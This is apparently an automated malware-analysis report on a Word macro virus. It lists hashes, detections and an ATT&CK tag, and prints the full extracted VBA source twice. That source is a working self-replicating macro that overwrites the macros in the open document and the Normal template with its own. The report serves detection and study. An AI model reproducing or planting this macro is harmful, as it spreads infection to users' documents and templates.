Office (OLE) malware analysis — malicious · b4efcd7754861ab0

MALICIOUS

Office (OLE)

26.0 KB Created: 1999-06-18 06:09:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 164752705660372e1a118884cfb520ea SHA-1: d0b45b18c925445f7319d2d589d56ec722c23817 SHA-256: b4efcd7754861ab053b3ee6a0997792e3fd4b7111c7cfda288da3efbc5c79c1e

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is a malicious Office document containing VBA macros. The Document_Open macro is designed to delete existing macros and replace them with its own code, which is identified as 'Small Class Macro Virus'. This indicates an attempt to ensure the macro runs and potentially spreads.

Heuristics 3

ClamAV: Doc.Trojan.Hope-13 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Hope-13
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 911 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	911 bytes
SHA-256: `006aee5f9963239ef4dd7c90ae417bf3cef0d134ec8a25cb68e783285e090a39`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() MC = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines) ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromString MC NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromString MC End Sub 'Small Class Macro Virus(SCMV) By Lys KovicK

SHA-256: 006aee5f9963239ef4dd7c90ae417bf3cef0d134ec8a25cb68e783285e090a39

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
MC = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromString MC
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromString MC
End Sub
'Small Class Macro Virus(SCMV) By Lys KovicK

Open this report in the interactive analyzer, or submit your own file for analysis.